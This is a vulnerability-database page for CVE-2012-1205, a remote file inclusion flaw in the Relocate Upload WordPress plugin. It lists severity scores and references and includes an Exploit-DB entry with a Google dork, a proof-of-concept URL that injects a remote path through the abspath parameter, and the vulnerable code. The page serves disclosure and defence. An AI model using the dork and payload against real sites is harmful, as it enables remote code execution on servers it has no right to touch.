CVE-2012-1205 : Detail

CVE-2012-1205

Code Injection
A03-Injection
1.75%V3
Network
2012-02-20
19h00 +00:00
2024-09-17
00h06 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

PHP remote file inclusion vulnerability in relocate-upload.php in Relocate Upload plugin before 0.20 for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the abspath parameter.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 17869

Publication date : 2011-09-18 22h00 +00:00
Author : Ben Schmidt
EDB Verified : Yes

# Exploit Title: Relocate Upload Wordpress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested) --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI --- Vulnerable Code --- // Move folder request handled when called by GET AJAX if (isset($_GET['ru_folder'])) { // WP setup and function access define('WP_USE_THEMES', false); require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

Products Mentioned

Configuraton 0

Alanft>>Relocate-upload >> Version To (including) 0.14

    Alanft>>Relocate-upload >> Version 0.10

      Alanft>>Relocate-upload >> Version 0.11

        Wordpress>>Wordpress >> Version *

        References

        http://secunia.com/advisories/47976
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://osvdb.org/79250
        Tags : vdb-entry, x_refsource_OSVDB
        http://www.securityfocus.com/bid/49693
        Tags : vdb-entry, x_refsource_BID